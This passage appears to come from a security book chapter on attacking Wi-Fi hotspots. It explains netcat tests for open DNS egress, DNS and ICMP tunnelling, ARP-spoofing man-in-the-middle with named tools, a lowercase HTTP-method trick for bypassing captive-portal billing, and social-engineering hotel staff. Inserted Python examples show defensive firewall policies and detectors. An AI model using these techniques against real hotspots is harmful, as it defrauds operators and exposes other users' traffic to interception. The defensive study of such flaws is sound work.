When a service provider offers up a hotspot, there are a number of infrastructure devices that need to be exposed. Figure 9-1, shown previously, lists a number of the common devices. All of these individual devices may suffer from common vulnerabilities, but in most cases the goal is not to exploit the devices themselves unless doing so yields free hotspot access, so we will focus on infrastructure attacks that target the hotspot access itself. The techniques discussed in the client attacks section can be used to attack the individual hotspot devices.
All hotspots offer a limited set of services for free; then they make you pay for premium services. Some hotspots offer more free services than administrators realize. Basic functionality of a hotspot requires DHCP, DNS, and a web portal for gathering information from the user or informing the user of acceptable use.
The most common hotspot business model involves offering a wireless network that is in an area open to potential clients. Normally, informational signs are displayed in the area letting potential clients know about the hotspot and listing the SSID or instructions on how to connect. After the client associates with the hotspot, the client uses DHCP to be automatically assigned an IP address and get information about DNS servers. When the client attempts to surf the Internet, he is redirected to the billing portal instead of the Internet site. For example, the client's home page may be http://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome; when the client requests the IP address of http://www.microsoft.com, he will be given the IP address, but the billing gateway will intercept the request and instead of displaying the requested page, the portal will use an HTTP 302 message to redirect the user to the portal. The following text is a sample of the process used in most hotspots:
GET /isapi/redir.dll?prd=ie&pver=6&ar=msnhome HTTP/1.1
Accept: */*
Accept-Language: en-us
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)
Host: www.microsoft.com
Connection: Keep-Alive
Cookie: A=I&I=AxUFAAAAAABTCQAA01oITwpPugXavLGSUeVhmw!!; WT_FPC=id=24.4.143.114-1062320096.29798824:lv=1156808225515:ss=1156807706437
The following is the intercepted response from the server; the 302 message redirects the client to the portal server:
HTTP/1.1 302 Temporarily Moved
Date: Fri, 24 Nov 2006 22:14:29 GMT
Server:
Location: https://securelogin.corpguestnetwork.domain/cgi-bin/login?cmd=login&mac=00:13:ce:45:24:XX&ip=10.0.00.2&essid=GUEST&url=http://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome
Content-Length: 0
Connection: close
Content-Type: text/html
The billing portal will authenticate existing clients or gather credit card information for billing. In some hotspots, the portal is just used to get the users to agree to an acceptable use policy. Sometimes a common password is used, such as a code published on the receipt for your latte or a password that you can get from the front desk of the hotel. Social engineering skills may come in handy here. For example, if you are close to a hotel network, you may try calling the reception desk from a house phone and asking for the password.
After the authentication process, the site redirects the client to the originally requested site. For this process to work, DNS needs to be functional. If you know how DNS works, that can be used to your advantage. When a DNS server gets a request, it first checks its local cache to see if it already knows the answer. If it does not, it resolves the name itself by locating the name server for that domain and querying it. So, your DNS request is forwarded from the hotspot to the Internet. You control where the request is sent and thus have a channel for connecting to the Internet.
To make things easier, many hotspot administrators are lazy. Instead of poking a hole for just DNS to a particular server, many hotspots will allow all DNS ports to go anywhere on the Internet. DNS uses TCP and UDP port 53. You can set up a simple proof of concept to test for this vulnerability. The only tool that you need is netcat. netcat is a general network tool that you can use to make connections on most protocols and ports. You can find it for just about any operating system.
Use the following command on the Internet-connected server. It opens a UDP (-u) listener (-l) on port (-p) 53.

Note: Make sure you do not have any hardware or software firewalls that might block the connections used in the following examples. Many operating systems come with bundled firewalls that need to allow both the incoming and outgoing connections.

dep0t@viper ~ $ nc -l -u -p 53
Now that your server on the Internet is listening, you can connect to your hotspot and send a test message. In this example, the IP address of the machine on the Internet is 10.0.0.1.
dep0t@cobra ~ $ nc -u 10.0.0.1 53 test
In this example, you will need to press ENTER after typing the test message. The message will then be sent to the server. This is what you will see on the server if the connection is successful:
dep0t@viper ~ $ nc -l -u -p 53
test
You can employ this technique as a proof of concept for any TCP or UDP port. Try experimenting with all ports. One way to find if there are any open protocols is by using a port scanner and a sniffer. You set up a sniffer in promiscuous mode on your Internet-connected server. If you see any packets sneak through from a full port scan, you will have identified your channel. Port scanners and sniffers are discussed in Part II of this book and briefly later in the chapter.
In this case, you may need to tunnel over the DNS protocol. As discussed earlier, with functional DNS, the attacker controls the destination of the query and the payload. This is an open channel to the Internet. If the attacker sets up a special DNS server, then the attacker can use the free DNS service for any type of communication. Internet Control Message Protocol (ICMP) is another common protocol that is generally left open on hotspots. There are many tools that can be used for tunneling over DNS and ICMP; ICMPTX and NSTX are good functional tools. Use the reference list at the end of the chapter to find out more information on the current version of these tools.
A few simple modifications to the hotspot will block this attack. Not all hotspots will allow general access to DNS ports to all hosts on the Internet; some hotspot administrators follow information security least privilege practices and only give access to the DNS server offered by the hotspot and block protocols such as ICMP.
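The two configurations just contrasted, the lax one that leaves port 53 and ICMP open to any host and the least-privilege one, together with a detector for the port-53 egress traffic described above, as an added example in Python (not the chapter's code or any hotspot vendor's). The resolver and portal addresses and the sample flows are constructed for the example.

```python
from collections import Counter
from dataclasses import dataclass

# Assumed addresses of the hotspot's own resolver and billing portal (not from the chapter).
RESOLVER = "10.0.0.53"
PORTAL = "10.0.0.80"

@dataclass(frozen=True)
class Flow:
    """One observed client flow; dport is 0 for ICMP."""
    src: str
    dst: str
    proto: str           # "udp", "tcp" or "icmp"
    dport: int
    authenticated: bool  # has this client passed the billing portal?

def lax_policy(f):
    """The weak configuration: port 53 to anywhere and all ICMP are free, only TCP is paywalled."""
    if f.authenticated or f.proto == "icmp" or f.dport == 53:
        return "allow"
    return "deny"

def least_privilege_policy(f):
    """Hardened: before authentication a client may reach only the hotspot's resolver and portal."""
    if f.authenticated:
        return "allow"
    if f.proto in ("udp", "tcp") and f.dport == 53 and f.dst == RESOLVER:
        return "allow"
    if f.proto == "tcp" and f.dst == PORTAL and f.dport in (80, 443):
        return "allow"
    return "deny"   # ICMP and port 53 to arbitrary Internet hosts are dropped

def tunnel_suspects(flows, threshold=20):
    """Flag unauthenticated clients sending port-53 traffic to hosts other than the resolver.
    A sustained stream of such packets is the footprint of the egress test or a DNS tunnel."""
    counts = Counter(f.src for f in flows
                     if not f.authenticated and f.dport == 53 and f.dst != RESOLVER)
    return sorted(src for src, n in counts.items() if n >= threshold)

# Constructed sample traffic: client 10.0.0.2 pushes 25 UDP/53 packets at the Internet host
# from the netcat test, client 10.0.0.3 performs a few ordinary lookups and one ping.
SAMPLE_FLOWS = (
    [Flow("10.0.0.2", "10.0.0.1", "udp", 53, False)] * 25
    + [Flow("10.0.0.3", RESOLVER, "udp", 53, False)] * 3
    + [Flow("10.0.0.3", "198.51.100.7", "icmp", 0, False)]
)
```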
Popularity: 5 | Simplicity: 4 | Impact: 9 | Risk Rating: 6
The benefit for an attacker to be local is that she can offer a better level of service for many services. The time it takes for a typical response from a web page, email server, or other service commonly used at a hotspot can vary from 50–200 milliseconds. A local attack could respond in less than a dozen milliseconds. Remember, a wireless hotspot is open for all to eavesdrop, so keeping communications secure is only possible with an encrypted channel. If an attacker waits and listens for a client to request a web page, the locally attached attacker can respond before the legitimate site. The client's web browser will display the page of the first response. Alternatively, the attacker can overwrite the MAC address of the default gateway and have the opportunity to man-in-the-middle (MITM) all traffic destined for other networks. This can be used to eavesdrop on traffic or replace the content of the requests with data from the attacker, for instance, injecting malware onto the victim machines.
There are many tools that can be used to perform a MAC spoofing MITM attack. These tools automate the process of sending out spoofed ARP packets to allow the attacker to pretend to be the router and then complete the connection to the real router after the attacker has a chance to examine or modify the packets. Some common tools are Dug Song's dsniff suite, Cain & Abel on Windows, and Ettercap. Figure 9-5 shows an example using Ettercap. In this example, a wireless attacker is eavesdropping on a network administrator using a wired connection to change the configuration of an access point.
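Detecting the gateway-MAC overwrite described above from the monitoring side, as an added example in Python (not from the chapter or from any of the tools it names): a passive ARP monitor that flags the gateway's MAC flip-flopping and any station answering for more than one IP. The gateway address and the ARP records are constructed for the example.

```python
from collections import defaultdict

GATEWAY_IP = "10.0.0.254"   # assumed default gateway of the hotspot segment

# Constructed ARP replies as (seconds, sender_ip, sender_mac), as a passive monitor on the
# hotspot would record them. At t=31 a second station starts answering for the gateway.
ARP_REPLIES = [
    (0.0,  "10.0.0.254", "00:13:ce:45:24:01"),
    (0.5,  "10.0.0.2",   "00:16:cb:aa:bb:01"),
    (1.0,  "10.0.0.5",   "00:0c:29:de:ad:01"),
    (30.0, "10.0.0.254", "00:13:ce:45:24:01"),
    (31.0, "10.0.0.254", "00:0c:29:de:ad:01"),
    (31.2, "10.0.0.254", "00:0c:29:de:ad:01"),
    (32.0, "10.0.0.254", "00:13:ce:45:24:01"),   # the real router answers again
]

def gateway_flip_flops(replies, gateway_ip=GATEWAY_IP):
    """Return (time, old_mac, new_mac) for every change in the MAC claiming the gateway IP.
    A legitimate gateway changes MAC rarely; MACs alternating within seconds is the signature
    of a spoofed-ARP MITM fighting the real router for the clients' cache entry."""
    learned = {}
    alerts = []
    for ts, ip, mac in replies:
        previous = learned.get(ip)
        learned[ip] = mac
        if ip == gateway_ip and previous is not None and previous != mac:
            alerts.append((ts, previous, mac))
    return alerts

def macs_claiming_multiple_ips(replies):
    """Map each MAC that answered for more than one IP to the set of IPs it claimed.
    A station that owns its own address and also answers for the gateway is the usual case."""
    claims = defaultdict(set)
    for _ts, ip, mac in replies:
        claims[mac].add(ip)
    return {mac: ips for mac, ips in claims.items() if len(ips) > 1}
```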
As discussed previously, some hotspots offer free services, some intentionally and some not. Some services, such as DNS, are critical to the proper functioning of the network. Other protocols, such as ICMP, may be open on a hotspot that charges for TCP services; these free services that are offered up for convenience may be used to bypass those pesky billing mechanisms. Many protocols can be employed, and your effectiveness will vary depending on the hotspot.
The following method can be used to bypass billing, but I recommend it as a good privacy mechanism. I have set up an SSH server on the Internet that I always use as a proxy when I am using a hotspot. SSH has a very convenient port-forwarding option that allows you to tunnel any TCP service to your secure Internet host. I also run a small HTTP proxy service on my Internet-connected host, so I can use it to evade any content filtering mechanisms or the prying eyes of the hotspot while keeping browser configurations simple. The communication method used is shown in Figure 9-6.
Many platforms used for hotspot management suffer from their own vulnerabilities. One common platform suffers from a simple vulnerability that has not been fixed for years. In a normal request the HTTP method, GET, is uppercase. The following is a sample of a typical HTTP GET request used in an earlier example:
GET /isapi/redir.dll?prd=ie&pver=6&ar=msnhome HTTP/1.1
Accept: */*
Accept-Language: en-us
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)
Host: www.microsoft.com
Connection: Keep-Alive
Cookie: A=I&I=AxUFAAAAAABTCQAA01oITwpPugXavLGSUeVhmw!!; WT_FPC=id=24.4.143.114-1062320096.29798824:lv=1156808225515:ss=1156807706437
By simply writing the method in lowercase (get instead of GET), you can bypass the annoying billing mechanism. This exploit still works at many hotspots.
get /isapi/redir.dll?prd=ie&pver=6&ar=msnhome HTTP/1.1
Accept: */*
Accept-Language: en-us
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)
Host: www.microsoft.com
Connection: Keep-Alive
Cookie: A=I&I=AxUFAAAAAABTCQAA01oITwpPugXavLGSUeVhmw!!; WT_FPC=id=24.4.143.114-1062320096.29798824:lv=1156808225515:ss=1156807706437
Instead of being redirected to the billing portal, my request is allowed to pass. I have used many methods to implement authentication bypass from simple web proxies with regex replacement features to advanced commercial penetration-testing tools.
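The gateway's 302 interception from the start of the section and the case-sensitive matching flaw just described, as an added example in Python (not the chapter's code or any hotspot platform's): a minimal gateway decision with the flawed matcher beside a fixed one that keys on the client's authentication state instead of on matching the request. The portal URL is taken from the capture above; the sample requests and the MAC, IP and ESSID values are constructed.

```python
from urllib.parse import quote

# Portal URL from the chapter's capture; the sample requests are constructed for this example.
PORTAL = "https://securelogin.corpguestnetwork.domain/cgi-bin/login"
REQ_UPPER = ("GET /isapi/redir.dll?prd=ie&pver=6&ar=msnhome HTTP/1.1\r\n"
             "Host: www.microsoft.com\r\nConnection: Keep-Alive\r\n\r\n")
REQ_LOWER = REQ_UPPER.replace("GET ", "get ", 1)   # the lowercase-method variant

def parse_request(raw):
    """Return (method, path, host) from the head of a raw HTTP/1.x request."""
    head = raw.partition("\r\n\r\n")[0]
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    host = ""
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() == "host":
            host = value.strip()
    return method, path, host

def portal_redirect(raw, mac, ip, essid):
    """Build the 302 a billing gateway returns to an unauthenticated client.
    The original URL is percent-encoded here; the chapter's capture passed it raw."""
    _method, path, host = parse_request(raw)
    original = "http://" + host + path
    location = (f"{PORTAL}?cmd=login&mac={mac}&ip={ip}&essid={essid}"
                f"&url={quote(original, safe='')}")
    return ("HTTP/1.1 302 Found\r\nLocation: " + location +
            "\r\nContent-Length: 0\r\nConnection: close\r\n\r\n")

def gateway_flawed(raw, authenticated):
    """The bug: only a request spelled exactly 'GET' is intercepted; anything else passes."""
    method, _, _ = parse_request(raw)
    if not authenticated and method == "GET":
        return "redirect"
    return "pass"

def gateway_fixed(raw, authenticated):
    """The fix: decide on the client's state, not on recognising the request.
    Unauthenticated traffic is redirected if it parses as HTTP and dropped otherwise."""
    if authenticated:
        return "pass"
    try:
        method, _, _ = parse_request(raw)
    except ValueError:          # malformed request line: default deny
        return "drop"
    if method.upper() in {"GET", "HEAD", "POST"}:
        return "redirect"
    return "drop"
```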
Many hotels and hotspots charge for a connection per device that connects. That really irritates me because I frequently travel for business with my Windows work laptop and my personal MacBook. It is not fair to double-bill me for my connection, and if I bring along an IP phone, then I could be billed for the connection three times. This technique can also be used if you are hosting a LAN party or have family in other rooms.
Many hotspot networks make you pay per device, so if you have multiple laptops, a PDA, or an IP phone, your five-dollar connection cost can skyrocket quickly. One way to bypass this annoying billing mechanism is by using Internet Connection Sharing. This can be accomplished by using the Internet connection features bundled with Windows or OS X. Also, many Linux distributions can be easily configured for network address translations using multiple interfaces. I, however, am lazy and do not like constantly changing the configuration of my devices, so I have found a way to do this with a cheap piece of hardware.
Using a pocket wireless device that can be configured as an access point, bridge, or NAT router is a convenient way to keep the same configuration on all my devices and only have to change one device as I travel. The device that I use is a D-Link DWL-G730AP. This device has a USB connection that can be used to power the device and a wireless and an Ethernet interface. I configure a wireless network that stays static and use the Ethernet port to plug into a wired hotspot network, mostly at hotels. It comes in a small travel case and has enough power to reach all over your hotel room and can even reach into the next room.